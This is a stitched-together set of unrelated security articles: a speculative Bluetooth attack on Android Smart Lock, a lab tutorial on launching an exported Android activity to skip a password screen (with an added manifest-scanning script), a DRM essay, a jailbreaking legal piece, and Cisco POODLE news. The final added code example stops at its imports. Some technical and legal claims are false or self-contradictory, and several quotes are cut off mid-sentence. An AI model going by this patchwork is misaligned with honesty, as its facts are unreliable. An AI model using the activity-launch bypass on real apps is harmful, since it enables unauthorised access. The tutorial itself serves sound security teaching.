Smart Lock will probably be a handy feature for many users. But my concern is whether or not Smart Lock introduces significant new security vulnerabilities to the Android and Chrome OS ecosystem. There is no publicly available technical documentation on Smart Lock as of this writing. But I do know that it uses Bluetooth for communication and authentication, which is probably the most pragmatic radio technology for its purpose. I can only speculate how Bluetooth is implemented for Smart Lock. Google recently acquired Impermium, so I am optimistic that they kept security in mind. Here is how the Bluetooth implementation may be attackable.

How Can Bluetooth Be Attacked?

For Defcon 2013, Charlie Miller and Chris Valasek demonstrated how the embedded systems in the 2010 models of the Ford Escape and the Toyota Prius can be penetrated. What their attack has in common with Android Smart Lock is that it is a way to attack a car's computer with Bluetooth. The major difference is that I am not sure whether Android Auto will have any access to a vehicle's driving mechanisms. For that reason, I will speculate that the Electronic Control Units that interact with the steering and braking are not a component of Android Auto. Android Auto might just give passengers access to general Android apps and functions (SMS, etc.), with GPS navigation, weather and traffic reports for the driver. But Miller and Valasek are among many researchers who have found ways to use Bluetooth to attack an embedded car system, which makes me concerned about the Bluetooth functionality in Android Auto, with or without ECUs.

The most potentially destructive Bluetooth vulnerability is man-in-the-middle attacks. Bluetooth usually uses EAP-AKA (Extensible Authentication Protocol - Authentication and Key Agreement) or EAP-SIM (EAP - Subscriber Identity Module) for authentication when such a framework has been implemented. A Bluetooth device, such as one using Android 5.0's Smart Lock, will acquire master keys from an authentication server. Bluetooth standards from 2.1 to 4.1 require encryption, which usually uses an AES algorithm. But encryption may be bypassed by conducting a man-in-the-middle attack, which involves spoofing packets with the headers that are used between a user's authorized Bluetooth devices, which can be a computer and a peripheral, or two computers. Smart Lock communications are between two computers, as all devices running Android are. Bluetooth communication designates one device as the master and the other as the slave, but the two devices may frequently switch roles.

There is a Bluetooth penetration testing suite called Bluediving. It has versions that run on Windows, GNU/Linux and FreeBSD, and it contains all the tools that are necessary for a man-in-the-middle attack. An attacker's laptop running Bluediving should first sniff packets that are used in the Link Management Protocol process when one Smart Lock device authenticates with another. The man-in-the-middle attack can work if the attacker's laptop is Bluetooth capable and connected to a WLAN, which may be open Wi-Fi, or the attacker may tether over 3G or 4G with their own phone or tablet. The sniffed packets contain the data the attacker's laptop needs to bypass the encryption: an authentication code, a Master Session Key, and the encryption command. Those are exchanged during an EAP-AKA challenge. The attacker's machine starts the spoof by replaying that traffic to whichever Smart Lock device is the slave. Now the slave thinks the attacker is the master. The attacker completes the EAP authentication process, which renders whatever encryption is implemented irrelevant. The attacker is decrypting now, and the cipher did not even need to be cracked. That is because a new, compromised MSK has been generated for the attacker, through their own WLAN connection to an internet server. Although the Bluetooth standard has measures that address authentication, it lacks measures for integrity. Because of the lack of integrity verification in the standard, the attack is able to hijack the authentication procedure in order to spoof for a man-in-the-middle attack.

Now that the attacker's machine is the "man in the middle", if their machine has other software that can exploit vulnerabilities in Android 5.0 and Smart Lock, the attacker can truly wreak havoc. At the very least, with the successful man-in-the-middle attack, maliciously unlocking Smart Lock on the Android device that is the Bluetooth slave should be a piece of cake. Through Smart Lock, the Android device will think the attacker is a legitimate user, so even the default filesystem encryption in Android 5.0 may be bypassed. That is wonderful for the attacker, because cracking AES-128 is a real pain; with 2014 technology it could take a computing cluster years, and the longer it takes to crack an encryption algorithm, the greater the risk that the attacker will be caught.

How Could Smart Lock's Bluetooth Be Implemented More Securely?

A more secure use of Bluetooth involves only having Bluetooth turned on when absolutely necessary, and having discoverability turned on only when the two legitimate Smart Lock devices are initially connecting. Here are the two common scenarios I can imagine for Smart Lock use. The user could be wearing an Android 5.0 smartwatch and have their Android 5.0 phone or tablet in their purse or pocket. Or the user could be in a car that has Android Auto (Android 5.0 in the car's embedded system), which unlocks their Android 5.0 phone or tablet. Discoverable mode can be on only while the Smart Lock devices authenticate each other, but Bluetooth will need to stay turned on for both devices for the duration of Smart Lock use. It may be a hassle for the user to keep discoverability turned off, though, in case the two devices need to reconnect after disconnecting for whatever reason. Oops! That is an opportunity for an attacker.

I really hope that Smart Lock only uses Bluetooth 4.1, because so many more vulnerabilities are known for all previous versions of Bluetooth. I imagine most successful 4.1 attacks will exploit zero-day vulnerabilities, and it is much more difficult for an attacker to find a zero-day. It would be great if Smart Lock required both devices to switch their master and slave roles frequently, because an attacker will need to focus on the slave for a man-in-the-middle attack. All passkeys that Smart Lock uses should be at least eight digits long; obviously, the longer the better. Google's servers that operate the Smart Lock feature should change a user's link keys as frequently as possible.

When Google releases technical documentation for how Smart Lock uses Bluetooth, we will get a better idea of whether they take security seriously. I hope that Google has penetration tested the feature thoroughly, but I will not be at all surprised if I hear about a successful Smart Lock attack technique at next year's Defcon. I personally will never use the feature myself, even though I will have at least a couple of Android 5.0 Lollipop devices of my own in the next few months. I see this as yet another situation where making a system more user friendly renders it less secure.

References
- Adventures in Automotive Networks and Control Units, Charlie Miller and Chris Valasek: http://illmatics.com/car_hacking.pdf
- Bluetooth Security, NSA: https://www.nsa.gov/ia/_files/factsheets/i732-016r-07.pdf
- Android 5.0 Lollipop official website
- Bluetooth Connectivity Threatens Your Security, Aaron Stern, Kaspersky Daily
- A Man-In-The-Middle Attack Using Bluetooth, Eric Gauthier, Security Science
- Top 5 Bluetooth Hacking Tools, Hack Yogi / Ethical Hacking Guide
- New Chrome feature will allow users to unlock a computer with a smartphone, Conner Forrest, TechRepublic
- Security, Bluetooth Developer Portal: https://developer.bluetooth.org/TechnologyOverview/Pages/Security.aspx
-
Mobile application security is one of the hottest segments of the security world, because security is a real concern as mobile applications grow. In this article we will go through the attacks associated with Android application components.

What are Android Application Components?

Application components are the essential building blocks of an Android app. Every app is built as a combination of some or all of these components, each of which can be invoked individually. There are four main components in Android:

Activity: An Activity provides a screen with which users can interact in order to do something, such as making a call or sending an SMS. Example: the login screen of the Facebook app.

Service: A Service performs long-running operations in the background and does not provide a user interface. Example: playing music.

Content Providers: A content provider presents data to external applications as one or more tables. In other words, content providers are interfaces that connect data in one process with code running in another process. Example: using a content provider, any app can read SMS messages from the built-in SMS app's repository on the device (the READ_SMS permission must be declared in the app's AndroidManifest.xml to access the SMS app's data).

Broadcast Receivers: A broadcast receiver is a component that responds to system-wide broadcast announcements such as battery low, boot completed or headset plugged in. Most broadcasts originate from the system, but applications can also send broadcasts.

This article demonstrates the methodology for attacking and securing vulnerable Activity components. As shown in the figure below, the test app has two activities. The first activity takes a password as input; if the user enters the correct password he lands on a page that says "Private Area", otherwise he gets a "Wrong password" message. For test purposes the password is set to "password". Ideally, the first screen should use an intent to invoke the second screen only if a valid password is entered. We will perform black box testing on this app to see whether we can bypass the authentication by invoking the welcome screen directly.

Prerequisites to follow the steps:
- a computer with the Android SDK installed
- a non-rooted mobile device on which to install the app

Topics involved:
- Information gathering
- Attacking vulnerable Activity components
- Securing the applications

Information gathering

Decompile the app with apktool and analyze the AndroidManifest.xml file for exported Activity components. Every Android app has a package name, and every Activity has its own class name inside that package. The first step is to find the package name and the names of the sensitive activities. There are other ways to get this information, but looking at AndroidManifest.xml is a good approach, and we can obtain that file by decompiling the application with apktool. Download apktool from the link below: https://code.google.com/p/android-apktool/downloads/list

Place the test application in the same folder as apktool, then decompile the APK with the following command, as shown in the figure: apktool d testapp.apk

As shown in the figure below, we now have a new folder named "testapp" with the AndroidManifest.xml file inside it. Next we search for the package name and its activities. All activities are registered in AndroidManifest.xml with <activity></activity> tags, so anything inside these tags is an activity. Looking at AndroidManifest.xml we can see two Activity components and the package name, as shown in the figure below. From the figure it is clear that:
- com.isi.testapp is the name of the package;
- com.isi.testapp.Welcome is probably the activity shown after the correct password is entered.

Attacking Vulnerable Activity Components

Our job now is to launch the Welcome activity without providing any password on the first screen. Attacks on vulnerable activity components can be performed in several ways:
- launching sensitive activities with the Activity Manager tool;
- using a malicious app to invoke activities of other apps.
We can also use the Mercury framework for these attacks, which will be covered in later articles.

Launching sensitive activities with the Activity Manager tool

Activity Manager (am) is a tool that ships with the Android SDK and is used from "adb shell". It can launch Activities and Services of an application, and we can even pass intents with it. So, let's begin. Connect the device to the computer and get a shell on it with the following command: adb shell

Type the following command to launch the Welcome activity: am start -n com.isi.testapp/.Welcome

We should now see the welcome screen fired up without providing the password.

Using a malicious app to invoke activities of other apps

Another way of invoking another application's activities is to write a malicious app and give it the package and activity name to launch. The figure below shows a code snippet that launches an activity, where com.isi.testapp.Welcome is the activity to be launched. In our case the malicious app does not need any permission to launch the "Welcome" activity of the vulnerable app.

Using the Mercury framework

The same attack can be reproduced with the Mercury framework, which we will discuss later in this series.

Securing the application components

Setting the android:exported attribute to false

In the AndroidManifest.xml of our application, add android:exported="false" to the application component to be secured; in our case the <activity> element for com.isi.testapp.Welcome. This restricts every other application and system component, other than the current app, from accessing the Activity. Only applications that run with the same user ID as the current app will be able to access it.

Limiting access with custom permissions

The android:exported attribute is not the only way to limit an activity's exposure to other applications. We can also impose permission-based restrictions by defining custom permissions for an activity. This is helpful when the developer wants to limit access to his app's components to those apps that hold the permission.

Note: the security controls above apply equally to the other application components discussed at the beginning of the article.

References:
- App Components | Android Developers

Other parts in this series:
- Android Hacking and Security, Part 2: Content Provider Leakage - InfoSec Institute
- Android Hacking and Security, Part 3: Exploiting Broadcast Receivers - InfoSec Institute
- Android Hacking and Security, Part 4: Exploiting Unintended Data Leakage (Side Channel Data Leakage) - InfoSec Institute
- Android Hacking and Security, Part 5: Debugging Java Applications Using JDB - InfoSec Institute
- Android Hacking and Security, Part 6: Exploiting Debuggable Android Applications - InfoSec Institute
- Android Hacking and Security, Part 7: Attacks on Android WebViews - InfoSec Institute
- Android Hacking and Security, Part 8: Root Detection and Evasion - InfoSec Institute
- Android Hacking and Security, Part 9: Insecure Local Storage: Shared Preferences - InfoSec Institute
- Android Hacking and Security, Part 10: Insecure Local Storage - InfoSec Institute
- Android Hacking and Security, Part 11: Blackbox Assessments with Introspy - InfoSec Institute
- Android Hacking and Security, Part 12: Securing Shared Preferences with Third Party Libraries - InfoSec Institute
- Android Hacking and Security, Part 13: Introduction to Drozer - InfoSec Institute
- Android Hacking and Security, Part 14: Examining Android App Specific Data on Non-Rooted Devices - InfoSec Institute
- Android Hacking and Security, Part 15: Hacking Android Apps Using Backup Techniques - InfoSec Institute
- Android Hacking and Security, Part 16: Broken Cryptography - InfoSec Institute
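The information-gathering step above reads AndroidManifest.xml by eye, the attack step builds an `am start -n` command from the package and activity names, and the hardening step adds `android:exported="false"` or a custom permission. The script below is an added example, written for this article rather than taken from it or from the Android SDK, that automates all three checks on the decompiled manifest. It applies the manifest rule that an explicit `android:exported` wins and that, without one, an `<activity>` is exported only if it declares an `<intent-filter>`; it reports a guarding `android:permission` so the tester knows a bare `am start` may be refused. The two manifests are constructed for this example using the article's package and activity names; the `AdminPanel` activity and `com.isi.testapp.permission.ADMIN` permission are assumed names added to show the custom-permission variant.

```python
"""Find Activities reachable by other apps in an AndroidManifest.xml (added example).

Usage in the article's workflow:
    apktool d testapp.apk
    python this_script.py testapp/AndroidManifest.xml
The functions below are also called directly with the constructed manifests.
"""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest modelling the vulnerable test app from the article:
# Welcome is explicitly exported, so any app (or `am start`) can open it.
VULNERABLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.isi.testapp">
  <application android:label="testapp">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".Welcome" android:exported="true"/>
  </application>
</manifest>
"""

# Constructed hardened manifest: Welcome is no longer exported, and an assumed
# AdminPanel activity stays exported but requires a signature-level custom permission.
HARDENED_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.isi.testapp">
  <permission android:name="com.isi.testapp.permission.ADMIN"
              android:protectionLevel="signature"/>
  <application android:label="testapp">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".Welcome" android:exported="false"/>
    <activity android:name=".AdminPanel" android:exported="true"
              android:permission="com.isi.testapp.permission.ADMIN"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def exported_activities(manifest_xml):
    """Return (package, [(activity_name, reason), ...]) for reachable Activities."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    app = root.find("application")
    if app is None:
        return pkg, found
    for act in app.findall("activity"):
        name = _attr(act, "name") or ""
        if name.startswith("."):            # shorthand relative to the package
            name = pkg + name
        explicit = _attr(act, "exported")
        has_filter = act.find("intent-filter") is not None
        if explicit is not None:            # explicit attribute always wins
            is_exported = explicit.lower() == "true"
            reason = "android:exported=%s" % explicit
        else:                               # implicit rule: intent-filter => exported
            is_exported = has_filter
            reason = "implicit (intent-filter present)" if has_filter else "implicit (no intent-filter)"
        perm = _attr(act, "permission")
        if is_exported:
            if perm:
                reason += ", guarded by " + perm
            found.append((name, reason))
    return pkg, found


def am_start_command(pkg, activity):
    """Build the `adb shell` command the article uses to launch an Activity directly."""
    short = activity[len(pkg):] if activity.startswith(pkg + ".") else activity
    return "am start -n %s/%s" % (pkg, short)


def report(manifest_xml):
    """Human-readable summary, one line per reachable Activity."""
    pkg, found = exported_activities(manifest_xml)
    return ["%s [%s]  ->  %s" % (name, reason, am_start_command(pkg, name)) for name, reason in found]


if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else VULNERABLE_MANIFEST
    print("\n".join(report(xml_text)))
```

Run it against the decompiled `testapp/AndroidManifest.xml`: every line it prints is an activity a malicious app, or `adb shell am start`, can open without the password screen. The launcher activity will always appear, since it must be exported; what matters is that sensitive screens such as `Welcome` do not.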
-
Part I: https://rstforums.com/forum/93619-fascinating-story-drm-part-one-wario-s-woes-when-i-little-girl-i-lov.rst Since the first part has already been posted, I thought I would continue this "series".
===================================================================

In my last piece, I explained how Nintendo's experiences with piracy and copy protection helped shape the current video game industry, where Sony has been a major player for nearly twenty years now. Technologies like the 10NES lock-out chip did not just help Nintendo and authorized third-party developers, they also benefited consumers. Take my word for it, unlicensed NES games were really awful. If you won't, install an NES emulator on your PC, smartphone or tablet and torrent a ROM for Sunday Funday or Myriad 6-in-1. That will be minutes of your life that you will never get back, and you don't want to punch a hole through your monitor.

But more recent DRM developments by multibillion-dollar publishers like EA and Activision have been very unfriendly to consumers. I can empathize with wanting to make it difficult to play pirated copies of games that often cost more than $20 million to develop. But when people who actually spent $60 on a legitimate physical or digital copy of a game can't play it either, that spells trouble for quarterly earnings reports.

Always On Your Nerves

Steam, an online PC gaming and retail platform launched by Valve in 2003, took the industry by storm. Not only does the service let PC gamers play online in multiplayer mode, it also retails games from most major PC game publishers and a multitude of independent PC game developers. Game developers and publishers like how Steam handles DRM: they have the option of using their own DRM software, Valve's, or none at all. Valve does not publicly release sales figures, but knowing that they have over 100 million active users and roughly 70% of the online PC game sales market, it is safe to assume that they make over a billion per year.

One of the biggest game publishers in the world, Electronic Arts, wanted a piece of the action for themselves. Piracy really worries big corporations like EA, and it is nice to get the retailer's portion of game sales revenue in addition to the portion that publishers usually get. So EA launched a similar service exclusively for games they publish, Origin. Origin launched for Windows on June 3rd, 2011, and for Mac OS X on February 8th, 2013.

When the first SimCity game debuted in 1989, it started a craze for simulation PC games that lasted throughout the 1990s. Game designer Will Wright co-founded Maxis to publish his game. When Wright was developing Raid On Bungeling Bay for Broderbund in the mid-1980s, he found the map creation process a lot of fun; SimCity was inspired by that, and may even have used some of the same code. Maxis developed and published a number of other simulation titles in the wake of SimCity's commercial success, such as SimAnt, SimTower, SimHospital and SimCity 2000. Other developers created competing games, many of them with "Tycoon" in the title. Wright and Maxis' success led EA to acquire Maxis in 1997. That was a good idea, because when The Sims was released in 2000 it quickly became one of the most profitable PC games of all time. After a third SimCity game and lots of expansion packs for The Sims, SimCity 4 was released in January 2003. That was a smart move by EA, because by the end of the year SimCity 4 was the seventh best-selling PC game, and four of the top six were expansion packs for The Sims.

It took about a decade, but a fifth SimCity game launched in March 2013, named simply SimCity. (The 1989 game was renamed SimCity Classic years ago.) I was disappointed by the smaller map sizes for cities. But I was even more disappointed that, unless one found a way to crack the game, saves could not be written to a local hard disk. Nope, games could only be saved on EA's servers. Also, one always had to be connected to EA's servers in order to play... even in single-player mode. Argh...

[SimCity (2013) screenshot, courtesy of Wired.com]

I never bought the game. No, I never tried pirating it either. Friends would tell me how cool it was that a new SimCity game was out, and that they wanted to buy it. "I don't recommend it," I'd tell them. It wasn't just that players are forced to be "always online". It wasn't just the small map sizes and dumbed down, I mean "casual-friendly", game mechanics. Nope. People who legitimately bought SimCity and tried to play it couldn't play the game at all. The servers for EA's Origin couldn't handle the traffic from such a popular new PC game that demands constant connectivity. EA's PR said that SimCity was designed to always be online in order to enhance users' fun with social functionality. I doubt it. SimCity was designed that way for DRM, to combat piracy. But there have got to be ways to use Origin servers for DRM that don't require constant connectivity, and not being able to save games to one's local disk is terrible. Throughout 2014, SimCity has worked a lot better thanks to additional Origin server capacity and patches. But I would still never buy that particular game.

They should have learned from what happened to Activision/Blizzard in 2012. Blizzard merged with Activision in 2008. Blizzard is most famous for the World of Warcraft MMO and South Korea's most popular spectator sport, StarCraft. But their action RPG series, Diablo, is tremendously popular as well. Blizzard's online multiplayer gaming service, Battle.net, debuted with the first Diablo game in 1997. With over seventeen years of Battle.net, plus experience managing the world's most popular MMO (WoW, of course) for over a decade, it is safe to assume that no corporation knows running online PC gaming better than Activision/Blizzard, except perhaps Valve with Steam.

When the Windows and Mac OS X versions of Diablo III launched in 2012, gamers were really hungry for it, because Diablo II had been released all the way back in 2000. But like SimCity afterward, Diablo III requires players to always be online, even for single-player games.

[Diablo III screenshot, courtesy of Ubergizmo]

At the 2012 launch, people who had legitimately purchased the game quite often couldn't even connect to Battle.net for a single-player session. At other times, even many months after the game debuted, movement and progression in the game would be frustratingly slow and choppy, even after a successful connection. Months after launch, and many patches later, a representative of Blizzard said, "We do not have plans to implement an offline mode. While the always-online requirement made the auction house possible, the auction house was never the driving factor in our decision to make the PC version of Diablo III require an Internet connection. The game was built from the ground up to take full advantage of Battle.net, which provides a number of important benefits, including persistent server-side character saves, a seamless PC multiplayer experience, cheat prevention, and Real ID and BattleTag social features." I don't need any damn "seamless multiplayer experience" if I am only ever going to play in single-player mode, Blizzard. Why don't they just flat out admit that their "always online" is a DRM mechanism?

Earlier this year, Diablo III: Ultimate Evil Edition came out for seventh-generation consoles (PS3 and Xbox 360) and eighth-generation consoles (PS4 and Xbox One). There haven't been any significant problems with that version of the game. Pretty soon I'll buy it for my PS4. I like PC gaming as much as I like console gaming, but when I spend my hard-earned cash, it will be on the version that runs the most smoothly. By never pre-ordering games, and by buying the games with the fewest bugs, I am doing what I can to send game developers and publishers an important message. Hopefully, AAA developers will give up the always-online DRM trend and, at the very least, implement much more consumer-friendly DRM if DRM is absolutely necessary at all. I prefer to spend most of my gaming time fighting AI only, so I also want to see more of a single-player focus in big-budget games, however old school that may seem.

It doesn't usually occur to people, but the DRM in games and applications is an information security issue, even when there are no attacks involved. Remember the CIA triad: confidentiality, integrity and availability. DRM may focus on integrity, in that it tries to prevent technical changes to software that allow piracy. But people also forget about availability. If I purchase a game or application, it should be available for me to enjoy. If developers ignore that, they do so at their peril.

The story of DRM is a fascinating one, and the issues with it don't always pertain to video games. There have been significant DRM issues with utility and content creation applications as well. In my next article, I'll focus on Microsoft and Adobe.

References
- SimCity Blackout Is Just One More DRM Disaster, Chris Kohler, Wired
- SimCity Review In Progress, IGN
- SimCity updates to 1.8, get your patch notes here, Tim Colwill, games.on.net
- Top Selling PC and Console Games of 2003, Game Sales Charts
- Diablo III Fans Should Stay Angry About Always-Online DRM, Erik Kain, Forbes: http://www.forbes.com/sites/erikkain/2012/05/17/diablo-iii-fans-should-stay-angry-about-alwaysonline-drm/
- Diablo 3 to remain always-online, despite planned auction house closures, Phil Savage, PC Gamer
- In The End, Diablo III Just Shouldn't Have Been 'Always Online', Kirk Hamilton, Kotaku
- Error 3003 in Diablo 3 is the hottest error at the moment, Edwin Kee, Ubergizmo
-
1. Introduction
The term “jailbreaking” refers to circumventing security measures of a mobile operating system with the aim to install unauthorized software. The term originates from the very first hacks on iPhones. The purpose of these hacks was to break the jailed environment of iPhones, which imposed restrictions on what resources were accessible. The tools used for jailbreaking include, but are not limited to, Spirit Jailbreak, Redsn0w iDemocracy, iActivator, iNdependence, and iFunstastic. With some of these tools, jailbreaking requires only clicking a few buttons and setting the iPhone into DFU (Device Firmware Upgrade) mode. Nevertheless, the jailbreaking tools perform multiple complex operations that are known only by certain information security experts. The term “jailbreaking” should not be confused with “unlocking”. The latter refers to freeing a mobile phone to work with a mobile operator different than the mobile operator chosen by the manufacturer of the mobile phone. However, both jailbreaking and unlocking constitute unauthorized modification of a mobile operating system. Fig.1 illustrates the relationships between these three concepts.
Fig. 1: Relationships between unauthorized modification of a mobile operating system, jailbreaking, and unlocking
People jailbreak their mobile phones in order to install various software, e.g. apps excluded by manufacturers and solutions to security vulnerabilities. Although jailbreaking can provide the user with the freedom to install whatever software he/she wants, jailbreaking may have legal implications. The purpose of this article is to examine the legality of jailbreaking in the United States (Section 2) as well as the legal risks associated with jailbreaking (Section 3). Next, this article discusses the future of the regulation of jailbreaking (Section 4). Finally, a conclusion is drawn (Section 5).
2. Legality of jailbreaking in the United States
The US Digital Millennium Copyright Act (DMCA) prohibits the circumvention of digital rights management schemes. While this prohibition was adopted with the aim to stop piracy, it can also be used to stop competitors who would like to create software for locked mobile operating systems. The term “locked mobile operating systems” refers to mobile operating systems that do not allow execution of software which is not approved by certain companies. Probably because of the negative effect of digital rights management schemes on consumer choice and competition, the Librarian of Congress decided to grant exemptions from the requirements of DMCA. The latest exemption related to jailbreaking became effective on October 28th, 2012. The exemption, which will be in force for a period of three years, legalizes jailbreaking. In November 2014, the Electronic Frontier Foundation (EFF) submitted a petition to the Librarian requesting the Librarian to “renew and expand the exemption for jailbreaking.” In the petition, the EFF argued that jailbreaking is used for lawful and useful activities. For example, the EFF stated that jailbreaking could be used to circumvent the restrictions built into Android which block software programs aiming to prevent leakage of personal information by other applications. If the Librarian does not renew the exemption for jailbreaking, jailbreaking will become a crime. It is worth mentioning that, in 2013, the Librarian did not renew the exemption for unlocking and, as a result, unlocking became punishable with a fine of up to USD 500,000 and/or up to 5 years imprisonment. However, in 2014, President Obama signed the Unlocking Consumer Choice and Wireless Competition Act, which made it illegal for people to unlock their cellphones. The Act will expire in 2015.
It should be noted that, while jailbreaking is currently legal in the United States, it may violate the End-User License Agreement (EULA) concluded between the seller and the buyer of a mobile phone. In this regard, Apple Support Document HT201954 states:
In the document, Apple also states that jailbreaking can lead to numerous issues to the hacked phone touch, including security vulnerabilities, disruption of services, shortened battery life, unreliable voice and data, and instability. Despite such warnings, pursuant to the Federal Trade Commission’s Magnuson-Moss Warranty Act of 1975, a seller of mobile phones cannot void the warranty, unless it can prove that the technical problem is linked to the installation of an after-market item (e.g. unauthorized software applications).
3. Legal risks associated with jailbreaking
According to the latest exemption published by the Librarian, the following computer programs shall be exempt from the prohibition against circumvention of technological measures:
This exemption does not apply to tablets. In relation to tablets, the Librarian stated that, because of the lack of a sufficient basis to develop an appropriate definition for tablet, the terms fall outside of the scope of the exemption. Also, the exemption does not apply to cases when jailbreaking is performed with the aim to install pirated software applications. In such cases, the violators would be liable not only for unlawful use of copyrighted material, but also for circumvention of digital rights management schemes. Thus, jailbreaking alone may not be illegal, but in a combination with a copyright violation, it may become a crime. It should be noted that some jailbreaking software is provided without EULA. Such jailbreaking software has to be installed by the user on a personal computer. Afterwards, the installed jailbreaking software will connect to the mobile phone and install an app on it.
Pursuant to the Berne Convention, an international intellectual property agreement applicable in 168 countries, software is automatically copyrighted at the time of creation. By using, without permission, copyrighted jailbreaking software in order to execute copyrighted jailbreaking mobile phone applications, the users of the software will infringe the copyright law and unlawfully circumvent digital rights management schemes. While the developers of jailbreaking software may never assert their copyrights in their software, such a possibility theoretically exists. The developers of jailbreaking software can even program their software in such a way as to provide them with location information about the users of the software. There are cases when unlawful users of copyrighted software receive letters from the copyright holders stating that the copyrighted software automatically provided the copyright holders with the location data of the infringers. In order to avoid legal problems, users of jailbreaking software need to ensure that they are entitled to use those applications. This can be done by looking at the EULA of the jailbreaking software. The EULA needs to state the ways in which a copy of the software can be used. If the jailbreaking software does not contain a EULA, it is advisable that the users do not use the software. This is because the lack of a EULA will lead to a lack of clarity as to the copyright status of the software.
4. The future of the regulation of jailbreaking
The acts of the Librarian of Congress and laws, such as the Unlocking Consumer Choice and Wireless Competition Act, clearly indicate the willingness of the government to legalize unauthorized modification of mobile phone operating systems (including jailbreaking). This willingness is a reflection of the opinion of a large number of American people.
In this regard, it is worth noting that the Unlocking Consumer Choice and Wireless Competition Act was a response to an official online petition, which collected more than 100,000 signatures in favor of the legalization of unlocking. The White House advisor Jeff Zients called the Act an
Jailbreaking is currently temporarily legalized. In 2015, the Librarian of Congress will have to decide whether it should continue to renew the exemption. Irrespective of whether this happens, a larger reform of the copyright law will be needed in order to ensure that the users of mobile phones will not be surprised one day by the news that the exemption provided by the Librarian expired. Such a surprise appeared in 2012, when the Librarian did not renew the exemption for unlocking.
5. Conclusions
This article has shown that jailbreaking is currently legal in the United States. However, it may be a risky activity because some of the jailbreaking software is provided without a EULA. Users installing jailbreaking software without a EULA may not only be prosecuted for unauthorized use of copyrighted materials, but also for unlawfully circumventing digital rights management schemes. It is risky to assume that because software is available for download, one has certain rights in relation to the software. A solution to this problem is to oblige the creators of jailbreaking software to add a EULA to their software. The solution can be implemented in a future law related to jailbreaking. In order to provide American people with certainty in relation to the legality of jailbreaking, such a law should not only permit jailbreaking, but also ensure that it will be legal for a period longer than three years. Otherwise, as the EFF pointed out, the
Source
-
Credit card frauds are very common these days – today a data breach occurs in a retailer’s shop, online shopping site or banking site and at the next moment millions of cards appear in the underground black market – how simple is that for cyber criminals nowadays. But imagine if there is no possible way to hack credit cards and ID cards. Seems like next to impossible, but quantum cryptography ensures that stealing people's personal data will soon be very difficult for hackers and cyber thieves due to an extra layer of verification.
SECURE FRAUD-PROOF CREDIT CARDS
The research at the University of Twente in Enschede, Netherlands has suggested that "fraud-proof" credit cards are possible to develop using Quantum Physics that will protect users’ financial and personal information from hackers. Security researchers describe this extra layer of verification as Quantum-Secure Authentication (QSA) of a "classical multiple-scattering key." With the help of the QSA method, people will be able to create a physical "key" which is impossible to copy or create similar ones. So, this new technology will not allow any person to copy someone’s credit card and can validate the identity of any person or object, including debit and credit cards, even if the most important data has been stolen, the Optical Society reported in the Dec. 15, 2014 edition of the journal Optica. However, Chip-and-Pin payment cards are opted by the major organisations to promote additional security solutions like tokenization and point-to-point encryption. Chip technology generates a unique code for every transaction, making it nearly impossible for criminals to use the card for counterfeit fraud. But we have also seen that the latest "Chip-and-PIN" technology is vulnerable to Card Cloning.
HOW QSA TECHNOLOGY WORKS
Now, the important thing to note is how this is possible and how Quantum Physics works with the credit card technology?
This innovative technology depends on two unique quantum properties of light to create a secure and unique Question-and-Answer (Q&A) exchange that cannot be 'spoofed' or copied. A single photon of light can occupy more than one location at the same time, and light has so many separate wavelengths that hacking a credit card would take centuries to find the right combination. The "quantum credit cards" would be more secure and fraud-proof because QSA technology leverages the immutable properties of quantum mechanics to create a perfectly secure encryption system, instead of any mathematical interpretation.
EASY TO IMPLEMENT AND HARD TO BREAK
According to Pepijn Pinkse, such a security layer would be "straightforward to implement with current technology," used by credit cards. Quantum credit cards would be outfitted with a strip of white paint containing millions of nanoparticles. Researchers could project individual photons of light onto this paint with the help of a laser; the photons would bounce around the nanoparticles as if in a pinball machine before escaping back to the surface and forming a unique pattern. This new technology could help in protecting government buildings, personal bank and credit cards, and even vehicles, according to the research.
Source
-
Two of Cisco’s products are vulnerable to the POODLE attack via the TLS implementation in those products. The vulnerability affects Cisco’s Adaptive Security Appliance software and its Application Control Engine module. The POODLE attack was disclosed in October by researchers from Google, who discovered that if an attacker can force a vulnerable Web server to fall back from a modern cryptographic protocol such as TLS to an older one such as SSLv3, under some circumstances he can then decrypt the secure connection. Originally, researchers believed that the attack was only effective against SSLv3, but last week Adam Langley from Google said that it also affected some implementations of TLS. Langley discovered that appliances from F5 Networks and A10 Networks both were vulnerable to the POODLE attack on TLS and notified the vendors. He said at the time that he didn’t think he had identified every vulnerable implementation. Cisco on Monday said that some of its products also are vulnerable. “A vulnerability in certain implementations of the TLSv1 protocol could allow an unauthenticated, remote attacker to access sensitive information,” the Cisco advisory says. “The vulnerability is due to improper block cipher padding implemented in TLSv1 when using Cipher Block Chaining (CBC) mode. An attacker could exploit the vulnerability to perform an ‘oracle padding’ side channel attack on the cryptographic message. A successful exploit could allow the attacker to access sensitive information.” Cisco did not say in its advisory whether there is a patch available to address the vulnerability in its products. Source
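As an added example (not from the Cisco advisory or this article), here is the padding-validation difference the advisory describes: an SSLv3-style check that inspects only the length byte, beside the strict TLS 1.x check that inspects every padding byte, run on a constructed CBC record. The record layout, block size and function names are assumptions; decryption and MAC handling are left out.

```python
"""
TLS 1.x CBC padding validation: the lax check vs the strict check.

Added example, not code from Cisco's advisory or the Threatpost article.
TLS CBC padding (RFC 5246, 6.2.3.2) is pad_len + 1 trailing bytes that all
carry the value pad_len. SSLv3 only defines the last byte, so an SSLv3-style
check ignores the padding bytes' contents; that is the behaviour the advisory
describes as improper padding handling in TLSv1 with CBC. Only the padding
step on already-decrypted plaintext is shown; decryption, MAC verification
and timing equalisation of a real record layer are left out.
"""
from typing import Optional, Tuple

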